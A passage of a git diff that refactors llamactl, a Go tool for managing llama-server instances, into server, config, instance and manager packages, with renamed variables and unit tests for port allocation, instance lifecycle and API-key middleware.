||||||
}
|
|
||||||
|
|
||||||
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
options1 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
options2 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
// Create multiple instances and verify they get different ports
|
|
||||||
instance1, err := manager.CreateInstance("instance1", options1)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
instance2, err := manager.CreateInstance("instance2", options2)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
port1 := instance1.GetOptions().Port
|
|
||||||
port2 := instance2.GetOptions().Port
|
|
||||||
|
|
||||||
if port1 == port2 {
|
|
||||||
t.Errorf("Expected different ports, both got %d", port1)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestCreateInstance_PortExhaustion(t *testing.T) {
|
|
||||||
// Create manager with very small port range
|
|
||||||
config := llamactl.InstancesConfig{
|
|
||||||
PortRange: [2]int{8000, 8001}, // Only 2 ports available
|
|
||||||
MaxInstances: 10, // Higher than available ports
|
|
||||||
}
|
|
||||||
manager := llamactl.NewInstanceManager(config)
|
|
||||||
|
|
||||||
options1 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
options2 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
options3 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
// Create instances to exhaust all ports
|
|
||||||
_, err := manager.CreateInstance("instance1", options1)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
_, err = manager.CreateInstance("instance2", options2)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// This should fail due to port exhaustion
|
|
||||||
_, err = manager.CreateInstance("instance3", options3)
|
|
||||||
if err == nil {
|
|
||||||
t.Error("Expected error when ports are exhausted")
|
|
||||||
}
|
|
||||||
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
|
|
||||||
t.Errorf("Expected port exhaustion error, got: %v", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestDeleteInstance_PortRelease(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
Port: 8080,
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
// Create instance with specific port
|
|
||||||
_, err := manager.CreateInstance("test-instance", options)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Delete the instance
|
|
||||||
err = manager.DeleteInstance("test-instance")
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("DeleteInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Should be able to create new instance with same port
|
|
||||||
_, err = manager.CreateInstance("new-instance", options)
|
|
||||||
if err != nil {
|
|
||||||
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestGetInstance_Success(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
// Create an instance first
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
created, err := manager.CreateInstance("test-instance", options)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Retrieve it
|
|
||||||
retrieved, err := manager.GetInstance("test-instance")
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("GetInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
if retrieved.Name != created.Name {
|
|
||||||
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestGetInstance_NotFound(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
_, err := manager.GetInstance("nonexistent")
|
|
||||||
if err == nil {
|
|
||||||
t.Error("Expected error for nonexistent instance")
|
|
||||||
}
|
|
||||||
if !strings.Contains(err.Error(), "not found") {
|
|
||||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestListInstances(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
// Initially empty
|
|
||||||
instances, err := manager.ListInstances()
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("ListInstances failed: %v", err)
|
|
||||||
}
|
|
||||||
if len(instances) != 0 {
|
|
||||||
t.Errorf("Expected 0 instances, got %d", len(instances))
|
|
||||||
}
|
|
||||||
|
|
||||||
// Create some instances
|
|
||||||
options1 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
options2 := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
_, err = manager.CreateInstance("instance1", options1)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance 1 failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
_, err = manager.CreateInstance("instance2", options2)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance 2 failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// List should return both
|
|
||||||
instances, err = manager.ListInstances()
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("ListInstances failed: %v", err)
|
|
||||||
}
|
|
||||||
if len(instances) != 2 {
|
|
||||||
t.Errorf("Expected 2 instances, got %d", len(instances))
|
|
||||||
}
|
|
||||||
|
|
||||||
// Check names are present
|
|
||||||
names := make(map[string]bool)
|
|
||||||
for _, instance := range instances {
|
|
||||||
names[instance.Name] = true
|
|
||||||
}
|
|
||||||
if !names["instance1"] || !names["instance2"] {
|
|
||||||
t.Error("Expected both instance1 and instance2 in list")
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestDeleteInstance_Success(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
// Create an instance
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
_, err := manager.CreateInstance("test-instance", options)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Delete it
|
|
||||||
err = manager.DeleteInstance("test-instance")
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("DeleteInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Should no longer exist
|
|
||||||
_, err = manager.GetInstance("test-instance")
|
|
||||||
if err == nil {
|
|
||||||
t.Error("Instance should not exist after deletion")
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestDeleteInstance_NotFound(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
err := manager.DeleteInstance("nonexistent")
|
|
||||||
if err == nil {
|
|
||||||
t.Error("Expected error for deleting nonexistent instance")
|
|
||||||
}
|
|
||||||
if !strings.Contains(err.Error(), "not found") {
|
|
||||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestUpdateInstance_Success(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
// Create an instance
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
Port: 8080,
|
|
||||||
},
|
|
||||||
}
|
|
||||||
_, err := manager.CreateInstance("test-instance", options)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("CreateInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Update it
|
|
||||||
newOptions := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/new-model.gguf",
|
|
||||||
Port: 8081,
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
updated, err := manager.UpdateInstance("test-instance", newOptions)
|
|
||||||
if err != nil {
|
|
||||||
t.Fatalf("UpdateInstance failed: %v", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
|
|
||||||
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
|
|
||||||
}
|
|
||||||
if updated.GetOptions().Port != 8081 {
|
|
||||||
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
func TestUpdateInstance_NotFound(t *testing.T) {
|
|
||||||
manager := createTestManager()
|
|
||||||
|
|
||||||
options := &llamactl.CreateInstanceOptions{
|
|
||||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
|
||||||
Model: "/path/to/model.gguf",
|
|
||||||
},
|
|
||||||
}
|
|
||||||
|
|
||||||
_, err := manager.UpdateInstance("nonexistent", options)
|
|
||||||
if err == nil {
|
|
||||||
t.Error("Expected error for updating nonexistent instance")
|
|
||||||
}
|
|
||||||
if !strings.Contains(err.Error(), "not found") {
|
|
||||||
t.Errorf("Expected 'not found' error, got: %v", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// Helper function to create a test manager with standard config
|
|
||||||
func createTestManager() llamactl.InstanceManager {
|
|
||||||
config := llamactl.InstancesConfig{
|
|
||||||
PortRange: [2]int{8000, 9000},
|
|
||||||
LogDirectory: "/tmp/test",
|
|
||||||
MaxInstances: 10,
|
|
||||||
LlamaExecutable: "llama-server",
|
|
||||||
DefaultAutoRestart: true,
|
|
||||||
DefaultMaxRestarts: 3,
|
|
||||||
DefaultRestartDelay: 5,
|
|
||||||
}
|
|
||||||
return llamactl.NewInstanceManager(config)
|
|
||||||
}
|
|
||||||
@@ -1,10 +1,13 @@
|
|||||||
package llamactl
|
package server
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"bytes"
|
"bytes"
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"fmt"
|
"fmt"
|
||||||
"io"
|
"io"
|
||||||
|
"llamactl/pkg/config"
|
||||||
|
"llamactl/pkg/instance"
|
||||||
|
"llamactl/pkg/manager"
|
||||||
"net/http"
|
"net/http"
|
||||||
"os/exec"
|
"os/exec"
|
||||||
"strconv"
|
"strconv"
|
||||||
@@ -14,14 +17,14 @@ import (
|
|||||||
)
|
)
|
||||||
|
|
||||||
type Handler struct {
|
type Handler struct {
|
||||||
InstanceManager InstanceManager
|
InstanceManager manager.InstanceManager
|
||||||
config Config
|
cfg config.AppConfig
|
||||||
}
|
}
|
||||||
|
|
||||||
func NewHandler(im InstanceManager, config Config) *Handler {
|
func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
|
||||||
return &Handler{
|
return &Handler{
|
||||||
InstanceManager: im,
|
InstanceManager: im,
|
||||||
config: config,
|
cfg: cfg,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -137,13 +140,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
var options CreateInstanceOptions
|
var options instance.CreateInstanceOptions
|
||||||
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
|
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
|
||||||
http.Error(w, "Invalid request body", http.StatusBadRequest)
|
http.Error(w, "Invalid request body", http.StatusBadRequest)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
instance, err := h.InstanceManager.CreateInstance(name, &options)
|
inst, err := h.InstanceManager.CreateInstance(name, &options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
@@ -151,7 +154,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
|
|||||||
|
|
||||||
w.Header().Set("Content-Type", "application/json")
|
w.Header().Set("Content-Type", "application/json")
|
||||||
w.WriteHeader(http.StatusCreated)
|
w.WriteHeader(http.StatusCreated)
|
||||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
@@ -177,14 +180,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
instance, err := h.InstanceManager.GetInstance(name)
|
inst, err := h.InstanceManager.GetInstance(name)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
w.Header().Set("Content-Type", "application/json")
|
w.Header().Set("Content-Type", "application/json")
|
||||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
@@ -212,20 +215,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
var options CreateInstanceOptions
|
var options instance.CreateInstanceOptions
|
||||||
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
|
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
|
||||||
http.Error(w, "Invalid request body", http.StatusBadRequest)
|
http.Error(w, "Invalid request body", http.StatusBadRequest)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
instance, err := h.InstanceManager.UpdateInstance(name, &options)
|
inst, err := h.InstanceManager.UpdateInstance(name, &options)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
w.Header().Set("Content-Type", "application/json")
|
w.Header().Set("Content-Type", "application/json")
|
||||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
@@ -251,14 +254,14 @@ func (h *Handler) StartInstance() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
instance, err := h.InstanceManager.StartInstance(name)
|
inst, err := h.InstanceManager.StartInstance(name)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
w.Header().Set("Content-Type", "application/json")
|
w.Header().Set("Content-Type", "application/json")
|
||||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
@@ -284,14 +287,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
instance, err := h.InstanceManager.StopInstance(name)
|
inst, err := h.InstanceManager.StopInstance(name)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
w.Header().Set("Content-Type", "application/json")
|
w.Header().Set("Content-Type", "application/json")
|
||||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
@@ -317,14 +320,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
instance, err := h.InstanceManager.RestartInstance(name)
|
inst, err := h.InstanceManager.RestartInstance(name)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
w.Header().Set("Content-Type", "application/json")
|
w.Header().Set("Content-Type", "application/json")
|
||||||
if err := json.NewEncoder(w).Encode(instance); err != nil {
|
if err := json.NewEncoder(w).Encode(inst); err != nil {
|
||||||
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
@@ -389,13 +392,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
instance, err := h.InstanceManager.GetInstance(name)
|
inst, err := h.InstanceManager.GetInstance(name)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
logs, err := instance.GetLogs(num_lines)
|
logs, err := inst.GetLogs(num_lines)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
@@ -426,19 +429,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
instance, err := h.InstanceManager.GetInstance(name)
|
inst, err := h.InstanceManager.GetInstance(name)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
if !instance.Running {
|
if !inst.Running {
|
||||||
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
|
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
// Get the cached proxy for this instance
|
// Get the cached proxy for this instance
|
||||||
proxy, err := instance.GetProxy()
|
proxy, err := inst.GetProxy()
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
@@ -489,11 +492,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
|
|||||||
}
|
}
|
||||||
|
|
||||||
openaiInstances := make([]OpenAIInstance, len(instances))
|
openaiInstances := make([]OpenAIInstance, len(instances))
|
||||||
for i, instance := range instances {
|
for i, inst := range instances {
|
||||||
openaiInstances[i] = OpenAIInstance{
|
openaiInstances[i] = OpenAIInstance{
|
||||||
ID: instance.Name,
|
ID: inst.Name,
|
||||||
Object: "model",
|
Object: "model",
|
||||||
Created: instance.Created,
|
Created: inst.Created,
|
||||||
OwnedBy: "llamactl",
|
OwnedBy: "llamactl",
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -545,19 +548,19 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
// Route to the appropriate instance based on model name
|
// Route to the appropriate inst based on model name
|
||||||
instance, err := h.InstanceManager.GetInstance(modelName)
|
inst, err := h.InstanceManager.GetInstance(modelName)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
if !instance.Running {
|
if !inst.Running {
|
||||||
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
|
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
proxy, err := instance.GetProxy()
|
proxy, err := inst.GetProxy()
|
||||||
if err != nil {
|
if err != nil {
|
||||||
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
|
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
|
||||||
return
|
return
|
||||||
@@ -1,10 +1,11 @@
|
|||||||
package llamactl
|
package server
|
||||||
|
|
||||||
import (
|
import (
|
||||||
"crypto/rand"
|
"crypto/rand"
|
||||||
"crypto/subtle"
|
"crypto/subtle"
|
||||||
"encoding/hex"
|
"encoding/hex"
|
||||||
"fmt"
|
"fmt"
|
||||||
|
"llamactl/pkg/config"
|
||||||
"log"
|
"log"
|
||||||
"net/http"
|
"net/http"
|
||||||
"os"
|
"os"
|
||||||
@@ -26,7 +27,7 @@ type APIAuthMiddleware struct {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
|
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
|
||||||
func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
|
func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {
|
||||||
|
|
||||||
var generated bool = false
|
var generated bool = false
|
||||||
|
|
||||||
@@ -35,25 +36,25 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
|
|||||||
|
|
||||||
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
|
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
|
||||||
|
|
||||||
if config.RequireManagementAuth && len(config.ManagementKeys) == 0 {
|
if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
|
||||||
key := generateAPIKey(KeyTypeManagement)
|
key := generateAPIKey(KeyTypeManagement)
|
||||||
managementAPIKeys[key] = true
|
managementAPIKeys[key] = true
|
||||||
generated = true
|
generated = true
|
||||||
fmt.Printf("%s\n⚠️ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
|
fmt.Printf("%s\n⚠️ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
|
||||||
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
|
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
|
||||||
}
|
}
|
||||||
for _, key := range config.ManagementKeys {
|
for _, key := range authCfg.ManagementKeys {
|
||||||
managementAPIKeys[key] = true
|
managementAPIKeys[key] = true
|
||||||
}
|
}
|
||||||
|
|
||||||
if config.RequireInferenceAuth && len(config.InferenceKeys) == 0 {
|
if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
|
||||||
key := generateAPIKey(KeyTypeInference)
|
key := generateAPIKey(KeyTypeInference)
|
||||||
inferenceAPIKeys[key] = true
|
inferenceAPIKeys[key] = true
|
||||||
generated = true
|
generated = true
|
||||||
fmt.Printf("%s\n⚠️ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
|
fmt.Printf("%s\n⚠️ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
|
||||||
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
|
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
|
||||||
}
|
}
|
||||||
for _, key := range config.InferenceKeys {
|
for _, key := range authCfg.InferenceKeys {
|
||||||
inferenceAPIKeys[key] = true
|
inferenceAPIKeys[key] = true
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -66,9 +67,9 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
|
|||||||
}
|
}
|
||||||
|
|
||||||
return &APIAuthMiddleware{
|
return &APIAuthMiddleware{
|
||||||
requireInferenceAuth: config.RequireInferenceAuth,
|
requireInferenceAuth: authCfg.RequireInferenceAuth,
|
||||||
inferenceKeys: inferenceAPIKeys,
|
inferenceKeys: inferenceAPIKeys,
|
||||||
requireManagementAuth: config.RequireManagementAuth,
|
requireManagementAuth: authCfg.RequireManagementAuth,
|
||||||
managementKeys: managementAPIKeys,
|
managementKeys: managementAPIKeys,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -1,18 +1,18 @@
|
|||||||
package llamactl_test
|
package server_test
|
||||||
|
|
||||||
import (
|
import (
|
||||||
|
"llamactl/pkg/config"
|
||||||
|
"llamactl/pkg/server"
|
||||||
"net/http"
|
"net/http"
|
||||||
"net/http/httptest"
|
"net/http/httptest"
|
||||||
"strings"
|
"strings"
|
||||||
"testing"
|
"testing"
|
||||||
|
|
||||||
llamactl "llamactl/pkg"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
func TestAuthMiddleware(t *testing.T) {
|
func TestAuthMiddleware(t *testing.T) {
|
||||||
tests := []struct {
|
tests := []struct {
|
||||||
name string
|
name string
|
||||||
keyType llamactl.KeyType
|
keyType server.KeyType
|
||||||
inferenceKeys []string
|
inferenceKeys []string
|
||||||
managementKeys []string
|
managementKeys []string
|
||||||
requestKey string
|
requestKey string
|
||||||
@@ -22,7 +22,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
// Valid key tests
|
// Valid key tests
|
||||||
{
|
{
|
||||||
name: "valid inference key for inference",
|
name: "valid inference key for inference",
|
||||||
keyType: llamactl.KeyTypeInference,
|
keyType: server.KeyTypeInference,
|
||||||
inferenceKeys: []string{"sk-inference-valid123"},
|
inferenceKeys: []string{"sk-inference-valid123"},
|
||||||
requestKey: "sk-inference-valid123",
|
requestKey: "sk-inference-valid123",
|
||||||
method: "GET",
|
method: "GET",
|
||||||
@@ -30,7 +30,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
name: "valid management key for inference", // Management keys work for inference
|
name: "valid management key for inference", // Management keys work for inference
|
||||||
keyType: llamactl.KeyTypeInference,
|
keyType: server.KeyTypeInference,
|
||||||
managementKeys: []string{"sk-management-admin123"},
|
managementKeys: []string{"sk-management-admin123"},
|
||||||
requestKey: "sk-management-admin123",
|
requestKey: "sk-management-admin123",
|
||||||
method: "GET",
|
method: "GET",
|
||||||
@@ -38,7 +38,7 @@ func TestAuthMiddleware(t *testing.T) {
|
|||||||
},
|
},
|
